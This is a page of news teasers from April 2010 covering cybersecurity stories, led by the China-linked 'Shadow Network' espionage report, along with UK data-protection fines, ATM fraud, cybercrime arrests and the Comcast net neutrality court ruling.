 Take lead on cyber crime, Ottawa told 
 (from nationalpost at 7-4-2010) 
 Researchers in Canada who cracked a major international cyber espionage ring are calling on the federal government to take a leading international role in combatting online crime. The attackers -- largely based in Chengdu, China -- used such popular tools as Twitter, blog posts and email accounts to gain control of computers and steal more than 700 high-level political documents, including confidential files about a missile system from India's national security establishment; Canadian visa ap... read more» 
   
 





 Coral Springs teen jailed on child pxxxgraphy charges 
 (from Sun-sentinel at 7-4-2010) 
 Authorities on Tuesday charged a Coral Springs teenager with 25 counts of possession of child pornography. Brandon Morgan, 18, was being held late Tuesday at the Broward County Main Jail on $10,000 bond. Investigators with the Attorney General's CyberCrime Unit said they found the images on the Internet during a routine investigation and traced the images back to Morgan's computer. Investigators seized three computers, several digital cameras and a disposable camera from Morgan's home dur... read more» 
   
 





 Security 'only skin deep' in Indian IT-BPO 
 (from DNAIndia at 7-4-2010) 
 Domestic IT and BPO service providers are yet to grasp the basic spirit behind data security even as their overseas clients worry more and more about terror strikes in India, according to a survey of Indian firms and their overseas clients. The survey, conducted by Forrester Research, found that Indian companies were confusing gadgets and technology for the real need — a culture of security. “Most vendor initiatives are merely gestures or marketing activities rather than genuine efforts at... read more» 
   
 





 DEB: Costs Consultation 
 (from webmedia at 7-4-2010) 
 The Government has published a consultation on how the costs of the notification obligations under the Digital Economy Bill should be shared out between Rights-holders, ISPs and subscribers. Responses are required by May 25th. (And no, you haven’t missed anything. It still is a Bill, not an Act, though consulting on its implementation does seem to presume that something pretty like the current text will be passed before the General Election on May 6th). Three groups of costs are identifie... read more» 
   
 





 Javelin report: ATM attacks growing in sophistication 
 (from TechTarget at 7-4-2010) 
 ATM attacks have shifted from basic skimming into attacks on ATM software and ATM networks, fraudulent mobile alerts, and account takeover via stolen information and call centers, according to a report released Tuesday by Javelin Strategy & Research. Traditional skimming is being replaced by more sophisticated attacks as criminals have become more organized and global, said Robert Vamosi, analyst at the Pleasanton, Calif.-based research firm and author of the report. "Now what we're seeing is... read more» 
   
 





 Is the U.S. the nation most vulnerable to cyberattack? 
 (from NetworkWorld at 7-4-2010) 
 Although the United States likely has the best cyberwar capabilities in the world, "that offensive prowess cannot make up for the weaknesses in our defensive position," one-time presidential advisor Richard Clarke argues in his forthcoming book Cyber War. Clarke -- who served as special advisor to the president for cybersecurity in 2001 and now teaches at Harvard's Kennedy School for Government and works at Good Harbor Consulting -- fears that any outbreak of cyber warfare would spill over in... read more» 
   
 





 Symantec urges business to bolster defences in order to avoid new £500k fines for breaches of Data Protection Act 
 (from viewfromthebunker at 7-4-2010) 
 As new legislation comes into force today which empowers the Information Commissioner’s Office (ICO) to levy fines on businesses of up to £500,000 for serious breaches of the Data Protection Act (DPA), Symantec has cautioned that fines are avoidable – provided adequate security best practice is adhered to. The ICO is aiming to give the data protection act ‘teeth’ and is clearly concerned about several high profile cases where unencrypted, confidential data residing on laptops and USB sticks h... read more» 
   
 





 Euthanasia group teaches seniors to hack Aussie filter 
 (from ComputerWorld at 7-4-2010) 
 Pro-euthanasia group Exit International is holding national hacking crash-courses in how to bypass the Federal Government's planned ISP-level Internet content filter with help from the Australian Pirate Party. The first of eight "Hacking Masterclasses" was held in Chatswood NSW on Thursday last week, and drew about 50 elderly people — some bearing laptops. Exit International director and controversial Australian physician, Philip Nitschke, created the class to help the elderly access euthanas... read more» 
   
 





 Half a million pound fines for data breaches from today 
 (from ComputerWorldUk at 7-4-2010) 
 The Information Commissioner will be able to issue fines of up to half a million pounds to businesses that break the Data Protection Act, from today (April 6). The Information Commissioner’s Office (ICO) was first granted the power to issue the large penalty in January. The announcement also marks the first time the ICO has been able to issue fines. Christopher Graham, the Information Commissioner, said: “These penalties are designed to act as a deterrent and to promote compliance with the... read more» 
   
 





 Many cloud computing customers 'lack security' 
 (from globalgold at 7-4-2010) 
 The majority of firms opting for cloud computing technology and services have inadequate security procedures in place, it has been claimed. Citing recent research conducted by Symantec and the Ponemon Institute, Justin Somaini, the former's chief information security officer, said that efficiency savings offered by cloud computing have driven the technology's uptake. However, he noted that while many firms are taking the plunge and opting for managed hosting services, the majority are fail... read more» 
   
 





 Companies should not use free security testing tools exclusively 
 (from zdnetasia at 7-4-2010) 
 Some businesses are using free security tools as part of their testing processes, but few, if any, are relying solely on open market software, according to industry watchers. The use of such free tools in an enterprise environment may be a good sign since most that do would otherwise not have conducted any form of security checks, Graham Titterington, principal analyst at Ovum, said in an e-mail. He noted that testing is still not a common practice in software development. Gerry Chng, Asea... read more» 
   
 





 More organisations adopt secure coding practices 
 (from ComputerWeekly at 7-4-2010) 
 Organisations are adopting secure programming practices, a report from Errata Security has found. In the survey of 46 software developers, 86% of the participants said their organisation had sent one or more members of the software development team to security training in a recent or current cycle. However, only eight out of 46 participants said that their organisation sent upper management level employees to training. The survey showed that the most popular form of security testing was st... read more» 
   
 





 Cyberattack: U.S. Unready For Future Face Of War 
 (from NPR at 7-4-2010) 
 For the United States, the prospect is especially worrisome. The entire U.S. economy depends on operations in cyberspace. If computer networks shut down, so will the country. Indeed, in a major cyberwar scenario, the United States would be uniquely vulnerable. No military is more dependent on data networking. Unmanned aircraft send video feeds back to Earth 24/7, while soldiers on the ground are guided by GPS signals and linked via computers to other units and command posts. "In the first ... read more» 
   
 





 China hackers 'stole' N-E, Naxal data 
 (from Indian Express at 7-4-2010) 
 A year after Indian embassies across the world were compromised by a China-based cyber espionage network, investigators have uncovered the extent of the spy ring, revealing that computers in the National Security Council Secretariat (NSCS) were infected, giving the hackers access to confidential documents on the security assessment of Northeastern states and Naxalite movement, besides information on missile defence systems and military equipment. More than 35 sensitive computers belonging to ... read more» 
   
 





 'Alien invasion' April Fools' story angers Jordan mayor 
 (from BBC at 7-4-2010) 
 A Jordanian mayor is considering suing a newspaper over an April Fools' Day report saying aliens had landed nearby. Al-Ghad's front-page story on 1 April said flying saucers flown by 3m (10ft) creatures had landed in the desert town of Jafr, in eastern Jordan. It said communication networks went down and frightened townspeople fled into the streets.... read more» 
   
 





 Boeing, U.S. Government Step Up Recruitment for ‘Cyberwarriors’ 
 (from Bloomberg at 7-4-2010) 
 Kyle Osborn makes a convincing technical support representative. After just a few phone calls, he’s able to persuade the other party to download malicious software. Osborn’s ruse won’t undermine security of any actual computer networks. He’s working the phones during a mock hacking competition at California State Polytechnic University in Pomona, California. The late-March event is one of a growing number of challenges aimed at helping the government and corporations including Boeing Co. find... read more» 
   
 





 Infosec 2010: Businesses can do more to stay out of court for data breaches, says top UK lawyer 
 (from ComputerWeekly at 7-4-2010) 
 Data breaches are fast becoming one of the biggest reasons that businesses could find themselves in court as the government tightens up data protection legislation. The reality is that no matter how much data protection policy and technology organisations have, they could still easily find themselves having to answer in court for a data breach. In data breach cases, the most damning evidence often comes from whistle blowers within the organisation keen to protect themselves from blame.... read more» 
   
 





 China-Based Hackers May Have Used Twitter, Google to Attack Dalai Lama, UN 
 (from Mashable at 7-4-2010) 
 A group of researchers has linked a huge, China-based cyber espionage ring to the theft of thousands of documents — including classified information, visa applications, and personal identities — from “politically sensitive targets” around the world. The command-and-control infrastructure of this so-called Shadow Network used platforms such as Twitter, Google Groups, Blogspot, Baidu Blogs, blog.com and Yahoo Mail to maintain persistent control of infected computers. They also used Tor, a syste... read more» 
   
 





 India was aware of hacking threat 
 (from India Times at 7-4-2010) 
 Last week, Indian cyber security officials were in Toronto to meet the researchers from Munk School of Global Affairs whose year-long project, `Shadows in the Cloud', tracked cyber espionage attempts against computers and servers in some 31 countries, but overwhelmingly in India, including the national security and defence establishments. Other "entities of interest", according to the report, included The Times of India. Over the past few months, after the first reports of a China-based netwo... read more» 
   
 





 China refutes hacking allegation 
 (from China at 7-4-2010) 
 China on Tuesday refuted a claim that Chengdu-based hackers stole information from the Indian Defense Ministry. "China firmly opposes any kind of cyber crime, including cyber attacks. The cyber attack is an international issue requiring the cooperation and joint efforts of the international community," Foreign Ministry spokesperson Jiang Yu told a press conference. A group of researchers at the Munk Centre for International Studies at the University of Toronto claimed that a cyber-espionag... read more» 
   
 





 Beijing denies hacking websites 
 (from godubai at 7-4-2010) 
 China on Tuesday dismissed reports that Chinese hackers have broken into top secret files of the Indian Defence Ministry and embassies around the world, saying that it was firmly opposed to hacking and regards it as an international crime. "We have been hearing frequently these kind of news and I do not know the purpose to stir up issues," Chinese Foreign Ministry spokesperson Jiang Yu said, replying to questions about reports of hacking of sensitive Indian sites in the media on Tuesday.... read more» 
   
 





 Hackers not linked to China's government: researcher 
 (from Yahoo at 7-4-2010) 
 China-based hackers who stole data on India's missile systems, private correspondence of the Dalai Lama and Canadian visa applications appear not to be linked to the Chinese government, Canadian researchers say. "I don't doubt that some of the sensitive information that was acquired might eventually find its way to elements within the Chinese government that may find it useful," said Nart Villeneuve, one of the University of Toronto researchers who took part in the investigation that uncovered... read more» 
   
 





 ICO powers will create data security focus, says expert 
 (from ihotdesk at 7-4-2010) 
 The powers available to the Information Commissioner's Office (ICO) were extended to make firms more attentive to data security, IT services users have heard. From today, the ICO will be able to issue fines of up to £500,000 to companies which have committed a "deliberate or negligent" breach of personal data protection. Commenting on the development, Network Box internet security analyst Simon Heron said a number of high-profile data breaches have caught the public's attention in the past... read more» 
   
 





 Web Probes On Defense Contractors Rising 
 (from Information Week at 7-4-2010) 
 Internet-based attempts to steal U.S. military technology via defense contractors are on the rise, according to an annual Department of Defense analysis of data supplied by the defense industry. Not only are network probes and intrusions on the increase, the Department of Defense said in the report, which it released late last month, but so are "bold and overt" requests for information made via e-mail and even social networks. Information systems are the most-heavily targeted of military ... read more» 
   
 





 Cyberattack Looming, Federal IT Pros Believe 
 (from Information Week at 7-4-2010) 
 A majority of federal IT professionals believe the U.S. is at risk for a major cyberattack, one against which the country is not adequately prepared to defend itself, according to a recent survey. Security vendor Lumension surveyed 201 IT professionals -- from the executive level to operations -- between Feb. 18 and 26, and found that 61 percent of them believe the potential in the next year for a cyberattack against critical IT infrastructure from a foreign nation is "high." Moreover, 42 ... read more» 
   
 





 Vietnam dismisses Google hacking claims 
 (from BBC at 7-4-2010) 
 Vietnam has rejected accusations made by Google and McAfee that malicious software had been used to spy on tens of thousands of Vietnamese web users. The companies said the software had been used to target anti-government blogs and websites. McAfee said the perpetrators of the attacks "may have some allegiance" to the country's government.... read more» 
   
 





 Vietnam Rejects Google Claims Of Cybercrime 
 (from IT Proportal at 7-4-2010) 
 The government of Vietnam has refused to acknowledge the 'groundless' accusations made by Google's Neel Mehta and McAfee Chief Technical Officer George Kurtz. They had both hinted that the government was involved in cyber attacks on blogs and websites belonging to protesters of a controversial mining project in the country. The blog post made by Neel Mehta, who is a member of Google's security team, suggested that the Vietnamese government had used malware, in the form of a Vietnamese langu... read more» 
   
 





 Update: Researchers track cyber-espionage ring to China 
 (from ComputerWorld at 7-4-2010) 
 Researchers in the U.S. and Canada have tracked and documented a sophisticated cyber-espionage network based in China, dubbed Shadow, that targeted computers in several countries, including systems belonging to the Indian government and military. The Shadow network of compromised computers was detailed in a report released Tuesday by the Information Warfare Monitor -- a project involving researchers at the University of Toronto's Munk Center for International Studies and The SecDev Group -- a... read more» 
   
 





 Report: China-based hackers stole India secrets 
 (from Yahoo at 7-4-2010) 
 China-based hackers stole Indian national security information, 1,500 e-mails from the Dalai Lama's office and other sensitive documents, a new report said Tuesday. Researchers at the University of Toronto said they were able to observe the hacking and trace it to core servers located in China and to people based in the southwestern city of Chengdu. The researchers said they monitored the hacking for the past eight months. The report said it has no evidence of involvement by the Chinese go... read more» 
   
 





 70 Romanian Phishers & Fraudsters Arrested 
 (from garwarner at 7-4-2010) 
 On March 4th, FBI Director Robert Mueller gave a speech on Cybercrime to the RSA conference where he mentioned that: And we have worked with the Romanian National Police to arrest more than 100 Romanian nationals in the past 18 months. Four years ago, several American companies threatened to cut cyber ties with Romania because of the rampant hacking originating from that country. And yet today, Romania is one of our strongest partners.... read more» 
   
 





 China denies hacking Indian Defence Ministry computers 
 (from calcuttanews at 7-4-2010) 
 China has denied that Chengdu-based hackers stole information from the Indian Defence Ministry. A group of researchers at the Munk Centre for International Studies at the University of Toronto claimed that a cyber-espionage group based in southwest China stole documents from the Indian Defence Ministry and emails from the Dalai Lama's office. The hackers allegedly stole classified reports about security in several Indian states, and about several Indian missile systems. "China firmly op... read more» 
   
 





 Researchers say China-based hackers stole India security information, Dalai Lama e-mails 
 (from StarTribune at 7-4-2010) 
 China-based hackers stole Indian national security information, 1,500 e-mails from the Dalai Lama's office and other sensitive documents, a new report said Tuesday. Researchers at the University of Toronto said they were able to observe the hacking and trace it to core servers located in China and to people based in the southwestern city of Chengdu. The researchers said they monitored the hacking for the past eight months. The report said it has no evidence of involvement by the Chinese go... read more» 
   
 





 Data Stolen From India, UN, Dalai Lama Traced To China 
 (from Information Week at 7-4-2010) 
 Just as in January, computer hackers based in China are being accused of cyber espionage and the Chinese government is denying involvement and calling the charges groundless. In January, the targets were Google, dozens of other companies, and the e-mail accounts of human rights activists. Following revelations about the incident, Google said it would stop censoring search results in China, a decision that led the company recently to redirect queries from mainland China to Google servers in Ho... read more» 
   
 





 Report: India targeted by spy network 
 (from CNet at 7-4-2010) 
 Researchers have uncovered a spy network that stole classified and other sensitive documents from the Indian government, the Dalai Lama's office, the United Nations, and compromised computers elsewhere, according to a report released on Tuesday. The operation, dubbed "Shadow Network," is detailed in a report that also cites evidence it says links the Shadow network to two people living in Chengdu, China, and the underground hacking community in that country.... read more» 
   
 





 Chinese spy ring targeted Indian government 
 (from ComputerWorldUk at 7-4-2010) 
 Researchers in the US and Canada have tracked and documented a sophisticated cyber-espionage network based in China, dubbed Shadow, that targeted computers in several countries, including systems belonging to the Indian government and military. The Shadow network of compromised computers was detailed in a report released by the Information Warfare Monitor - a project involving researchers at the University of Toronto's Munk Center for International Studies and The SecDev Group - and the Shado... read more» 
   
 





 Simplifying Organisational Security and Achieving PCI Compliance 
 (from Linkedin at 7-4-2010) 
 Computime Ltd would like to invite you to a half-day specialized security seminar which is being held at the San Gorg Corinthia in St George’s Bay on Wednesday 14th April. The seminar is aimed to help you: 1) Automate and Patrol Your Organisation’s Security Learn about the latest solutions in Security and Event Management from LogRhythm, a company which provides enterprise-class Log Management and SIEM 2.0 solutions that empower organizations to comply with regulations, secure their networ... read more» 
   
 





 CSO Interchange London - May 10th, 2010 - Forum: 8:00 a.m. - 2:00 p.m. 
 (from csointerchange at 7-4-2010) 
 Leading enterprise security executives and industry experts will discuss timely topics at the upcoming CSO Interchange Forum London. CSO Interchange uses an interactive format and roundtable sessions where small groups of senior security executives can discuss topics and exchange ideas. The CSO Interchange concludes with a lunch buffet reception.... read more» 
   
 





 Police cuff 70 eBay fraud suspects 
 (from The Register at 7-4-2010) 
 Romanian police have arrested 70 suspected cybercrooks, thought to be members of three gangs which allegedly used compromised eBay accounts to run scams. The alleged fraudsters obtained login credentials using phishing scams before using these trusted profiles to tout auctions for non-existent luxury goods (luxury cars, Rolex watches and even a recreational aircraft). Buyers handed over the loot but never received any goods in return. The 800 victims of the scam are estimated to have suffe... read more» 
   
 





 Detecting Malicious Insiders Before Data Breaches Damage Your Business 
 (from EWeek at 7-4-2010) 
 Data breaches carried out by malicious insiders may be uncommon, but the damage they wreak can be catastrophic if detected too late. Enterprises need to take an active approach to dealing with the problem, which means understanding who the malicious insiders are, what drives them and how that should influence security policy.... read more» 
   
 





 The Many Paths to Security Awareness 
 (from Internet Storm Center at 7-4-2010) 
 Promoting Security Awareness is an ongoing challenge in our field. Without a good understanding of Security Awareness and issues, getting appreciation at the senior management level for security issues is a real problem. Security Awareness is critical in influencing business decisions to include (and hopefully fund) security components into every project, protecting the corporate assets from both theft and lawsuits. However, Security Awareness does not mean the same thing to everyone in a ... read more» 
   
 





 Five things you need to tell your parents about computer security 
 (from NetworkWorld at 7-4-2010) 
 Ever get that tech support call from your parents saying, "My computer is slow all of a sudden" or "I have all sorts of weird things popping up on my screen"? You then troubleshoot the problems only to find out that malware, spyware, viruses or other such nastiness is the culprit. To be sure you eradicate all the bugs you resort to a full format and reinstall of everything, thus taking you hours. If you've been there, done that, here are five basic security tips to provide to your parents that, if... read more» 
   
 





 But How Could Wikileaks Break A Story Without Traditional Newspaper Backing? 
 (from Techdirt at 7-4-2010) 
 By now you've likely seen the rather horrifying Collateral Murder website, put together from the video leaked to Wikileaks (for which, apparently, US intelligence officials investigated some of the Wikileaks folks). While there's a lot of ongoing back-and-forth over what the video really shows, there's no doubt that the release of the video is a journalistic scoop. And yet, we keep being told that if newspapers fail, no one will be left to do investigative journalism? So what were the traditi... read more» 
   
 





 Blunder reveals Gordon Brown's email address 
 (from TechWorld at 7-4-2010) 
 With the UK election campaign barely hours old, a government official has gaffed by revealing the private email addresses of many senior politicians to journalists. The data accident happened in an email sent out without using the BCC (blind courtesy copy) feature to lobby journalists, giving the Downing Street official's contact details for use during the forthcoming campaign. The email embedded the full address list in open text, which made public email contacts for an unnamed but long list ... read more» 
   
 





 SHADOWS IN THE CLOUD: Investigating Cyber Espionage 2.0 
 (from Scribd at 7-4-2010) 
 The researchers at InfoWar Monitor and Shadow Server have released a great research paper that adds to the Ghostnet report from last year. To view the research paper click the link below : http://www.scribd.com/doc/29435784/SHADOWS-IN-THE-CLOUD-Investigating-Cyber-Espionage-2-0... read more» 
   
 





 Hackers: not just geeks, but activists 
 (from TheStar at 7-4-2010) 
 The word “hacker” conjures up a vision of a geek in a basement, snickering diabolically as he steals identities or credit card numbers. But, as Tuesday’s news out of U of T shows, sometimes hackers are good guys. Members of the university’s Citizen Lab cracked the Shadow Network, a Chinese-based espionage ring that had been pilfering sensitive international information, including visa applications Canadians submitted to the Indian government. So if hackers aren’t inherently criminals, what... read more» 
   
 





 The FreeMalaysiaToday news website has been the target of a consistent DDOS attack 
 (from freehacking at 7-4-2010) 
 The FreeMalaysiaToday news website has been facing severe technical glitches, leading to a disruption in services. The fledgling independent news website has been the target of a consistent “Distributed Denial of Service or DDOS” attack. FMT's head of information technology N Thirun said that measures are being put in place to address this issue. “It is a very intelligent and planned attack. Previously, they were just teasing us but the situation has now become serious. Yesterday, we ca... read more» 
   
 





 Public sector opportunities in the cloud 
 (from ChannelWeb at 7-4-2010) 
 The public sector remains an appealing market, as billions are still spent each year on goods and services essential to the delivery of public services. The answer could come in the form of cloud and mobile technology. The cost-saving potential of moving traditional on-premise applications to the cloud is well documented. The cloud can also improve application accessibility for people who are not always office-based, as well as enhance communications.... read more» 
   
 





 Pirated software is fine, say one in three Brits 
 (from v3 at 7-4-2010) 
 A third of UK citizens believe that it is acceptable to use pirated software at home or at work, according to a new survey conducted by Microsoft. The poll of 1,000 people showed that pirated software is nearly as popular in the workplace as it is at home. Microsoft said that the trend is alarming because chunks of its revenue are lost each year to pirated software. One in eight employed adults surveyed admitted using pirated software at work, aligning with the fact that 57 per cent of respond... read more» 
   
 





 Google targets teens with Buzz safety campaign 
 (from v3 at 7-4-2010) 
 Google has posted a new video instructing users on how to safely manage their Buzz accounts. The company said that the video will target teenage users in particular. The YouTube video was posted through the company's Safety Channel, a YouTube feed dedicated to helping younger users stay safe online. However, the video provides a number of tips for users on how to manage their personal information and control who is able to view their Buzz account information. "We created Google Buzz to make ... read more» 
   
 





 The death of Net neutrality: Five quick thoughts 
 (from ZDNet at 7-4-2010) 
 Today, a federal appeals court rejected the FCC’s claim that Comcast couldn’t “sculpt” Internet traffic and block the flow of BitTorrent data. This effectively put a stake in the heart of Net neutrality. It sets a precedent for all such cases, and, in effect, allows Internet carriers of all types to adjust their traffic in any way they wish. This is bad news for all of us online. Here are five quick thoughts: #1 Killing Net neutrality means big players always win : There could come a time w... read more» 
   
 





 Aussie pleads not guilty to luring Canadian teen over net 
 (from The Sydney Morning Herald at 7-4-2010) 
 An Australian man accused of using the internet to lure a 14-year-old Canadian girl before sexually assaulting her has pleaded not guilty to the charges. Anthony John Porter, a 37-year-old from Woody Point in Queensland, was arrested in Corner Brook, a city in the Canadian province of Newfoundland, last week after local authorities received a complaint from the public of inappropriate conduct....read more» 
   
 





 China denies Canadian hacker claims 
 (from Yahoo News at 7-4-2010) 
 China on Tuesday denied that hackers based in the country targeted Indian government computers and accessed military secrets, weeks after Google effectively shut its China search engine over cyberattacks. The denial came after Canadian researchers claimed that a China-based online spying network leveraged popular Web services such as Twitter, Google Groups and Yahoo! Mail to steal information from the New Delhi government and other Indian networks.... read more» 
   
 





 Cyber Insecurity: U.S. Struggles To Confront Threat 
 (from NPR at 7-4-2010) 
 Americans do not often hear that someone has found a way to overcome U.S. defenses, but military and intelligence officials have been sounding downright alarmist lately with their warnings that the country is ill-prepared to deal with a cyberattack. Director of National Intelligence Dennis Blair opened his annual survey of security threats in February by advising Congress that "malicious cyberactivity is growing at an unprecedented rate," and that the country's efforts to defend against cyber... read more» 
   
 





 Web filter splits opposition 
 (from The Age - Australia at 7-4-2010) 
 The federal opposition is yet to formulate a position on the proposed internet filter despite Labor flagging its intention to introduce the measure before the last election. The failure of Coalition leader Tony Abbott or his communications spokesman Tony Smith to indicate whether they would support the bill reflects divisions within the party about the government's plan to block access to internet sites banned under Australia's classification rules.... read more» 
   
 





 Business-savvy cybercriminals work to improve their image 
 (from ZDNet at 7-4-2010) 
 Despite the dubious success of botnets such as Zeus, which has infected thousands of machines around the world, the authors of malware apparently have plenty of business issues to worry about to earn a dishonest crust. Zeus, described as the world's largest botnet, delivers a banking Trojan that sends data back to those in control of the network. Like other cybercriminals, the creators of Zeus have taken several leaves from the book of legitimate commercial software, including the concept of off... read more» 
   
 





 Court rules against US FCC's Comcast net neutrality decision 
 (from Computer World at 7-4-2010) 
 A U.S. appeals court has ruled that the U.S. Federal Communications Commission did not have the authority to order Comcast to stop throttling peer-to-peer traffic in the name of network management. The U.S. Court of Appeals for the District of Columbia Circuit, in an order Tuesday, overturned the FCC's August 2008 ruling forcing Comcast to abandon its network management efforts aimed at users of the BitTorrent P-to-P (peer-to-peer) service and other applications. The FCC lacked "any statutori... read more» 
   
 





 Spy Network Pilfered Classified Docs From Indian Government and Others 
 (from Wired at 7-4-2010) 
 A spy network targeting government networks in India and other countries has been pilfering highly classified and other sensitive documents related to missile systems, the movement of military forces and relations among countries, according to a report released Tuesday. It also grabbed nearly a year’s worth of personal correspondence from the Dalai Lama’s office, even after reports published last year indicated that the Dalai Lama’s network had been compromised in what is believed to be a sep... read more» 
   
 





 Recommended Reading: Shadows in the Cloud 
 (from politicalhacking at 7-4-2010) 
 In a followup to the "Tracking GhostNet" report, a new analysis of attacks against Tibetan and Indian cyber targets has been released titled "Shadows in the Cloud: Investigating Cyber Espionage 2.0". I highly recommend this report. The report is an excellent synopsis of an in-depth investigation into attacks and information thefts that: "...documents a complex ecosystem of cyber espionage that systematically compromised government, business, academic, and other computer network systems... read more» 
   
 





 Australian Crime Commission to overhaul network 
 (from Computer World at 7-4-2010) 
 The Australian Crime Commission (ACC) will overhaul its voice and networking infrastructure, flagging that it will simplify and consolidate its fixed-line voice telephony contractual arrangements and deploy a higher capacity secondary data network. The organisation currently operates a partially converged voice and data network between its Sydney, Brisbane, Canberra, Melbourne, Adelaide and Perth offices and its primary data network is built upon a virtual private LAN service delivered by Nex... read more» 
   
 





 Monthly Malware Statistics: March 2010 
 (from Securelist at 7-4-2010) 
 Malicious programs detected on users’ computers The first Top Twenty lists malicious programs, adware and potentially unwanted programs that were detected and neutralized when accessed for the first time, i.e. by the on-access scanner. There was no major change in the first Top Twenty leader board in March. Three variants to the Autorun Trojan are worthy of mention. As was the case a couple of months back, they are autorun.inf files that use removable devices to spread the notorious P2P... read more» 
   
 





 FCC network neutrality powers overturned by court 
 (from v3 at 7-4-2010) 
 A Federal Appeals Court has ruled that the Federal Communications Commission (FCC) does not have the right to enforce network neutrality rules, allowing Comcast to throttle back peer to peer traffic. In a 3-0 ruling the court for the District of Columbia Circuit found that the FCC lacked the authority to force internet service providers (ISPs) to treat all internet traffic evenly and Comcast could limit the speed of applications like peer to peer.... read more» 
   
 





 Attending Big Data Workshop 
 (from netmesh at 7-4-2010) 
 Location: Computer History Museum in Mountain View, CA.
 Date: April 23, 2010, 9am to 5pm.
 I hope to discuss with other attendees things such as:
 * key-value stores, document databases, graph databases, column stores etc. are all NoSQL databases. When and why would I choose one vs. another?
 * is there a future for NoSQL in the enterprise? Which vendors? What business models?
 * what are the requirements for data architectures in the cloud?
 * what can we do to drive business adoption of... read more» 
   
 





 Hackers and Founders Goes to Hacker Dojo 
 (from Meetup at 7-4-2010) 
 Location Hacker Dojo 140A S Whisman Road Mountain View, CA 94041 1-800-goog411 Who is hosting? Jonathan Nelson We are still ironing out the details, which we will post soon. This meetup, we have a group of hackers and founders visiting from the UK on the http://developermissi... tour. They asked us to set up a meetup for them, and we're happy to oblige. The organizer Jonathan Markwell came to our meetup from the UK the very first event we had, and we're looking forward to ca... read more» 
   
 





 State AGs Pick Up HITECH Enforcement 
 (from Channel Insider at 7-4-2010) 
 Forty-five states and territories now have data breach disclosure laws, but early indications are that state attorneys general are more willing to use the federal Health Information Technology for Economic and Clinical Health (HITECH) Act as a means for prosecuting lapses in exposed health care records. According to Health Leaders Media, Connecticut Attorney General Richard Blumenthal has brought legal action against several hospitals for not properly disclosing security lapses that resulted in ... read more» 
   
 





 CISecurity Metrics Move Ahead 
 (from Chuvakin at 7-4-2010) 
 The top three goals of metrics programs are to:
 1. Improve security outcomes (35%)
 2. Improve risk management decisions (30%)
 3. Improve security process performance (15%)
 The top three reasons why metrics are requested are (in order):
 1. For security trends
 2. Evidence of compliance
 3. To justify spending... read more» 
   
 

